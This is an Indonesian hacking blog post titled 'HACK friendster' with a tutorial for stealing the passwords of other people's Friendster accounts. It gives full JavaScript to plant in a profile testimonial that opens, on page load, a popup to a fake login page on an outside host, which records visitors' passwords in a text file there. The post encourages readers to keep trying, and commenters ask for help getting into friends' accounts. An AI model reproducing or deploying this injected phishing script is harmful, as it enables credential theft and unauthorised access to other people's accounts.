Blog nya Orang Bego

Cyber, Hacking, Tutorial, Virus,Anti Virus and more

HACK friendster

Posted by adixersoft pada 25/01/2009

Pernah gak kepikiran untuk melihat isi frendster teman anda…pastinya loe harus tahu dulu password nya kan??

ok tenag aja jangan takut adizonnerss….sekarang gw akan coba mengjak loe melakukan hal usil sedikit..aje ye..kalo kebanyakan tar takut gimana gituh….he9x

ok adizonners bagaimana caranya bisa kita lihat pada tutorial berikut ini.

1. Masuk ke testimonial teman anda / target anda. misal http://www.friendster.com/g4anthenk
2. Masukkan :
halo sayang gantengku atau (apa terserah asal ada tulisan),
2. lalu Copy source atau Script yang ada di bawah ini

<html>
<head>
<title>hackfs</title>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″>
</head>

<body bgcolor=”#00FFFF” text=”#000000″>

<SCRIPT LANGUAGE=”JavaScript”>
<!– Begin
function popupPage() {
var page = “http://www.yogyafree.net/familycode/friendster.html”;
windowprops = “”
;

window.open(page, “hackfs”, windowprops);
}
// End –>
</script><BODY onLoad=”setTimeout(‘popupPage()’, 1000);”>
</p>
Isi Testimonial ya
</body>
</html>

4. Paste source nya di bawah tulisan kita tadi
3. Lalu tunggu sampai approve testimonialnya.
4. Setelah di approve maka anda dapat menunggu target atau para pengguna friendster membuka fs target dan tentu saja melakukan login di friendster target anda. ( Saat fs target terbuka maka dalam beberapa detik / waktu langsung berubah halaman menjadi halaman untuk login yang hasilnya akan Password direcord dibawah ini

http://www.yogyafree.net/familycode/friendster.txt

Sumber referensi

ForumYF

Adizonner selamat mencoba…banyak kok yang dah berhasil, kalo gak berhasi coba terus sampai bisa selamat berjuang adizonners.

2 Tanggapan to “HACK friendster”

  1. eLm said

    udah gak bisa ya?

  2. ika said

    kok g bisa masuk >>>> http://www.yogyafree.net/familycode/friendster.txt ??????

    tolongin ,,, mau ambil FS teman yg di hack hikzzz…hikz..

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: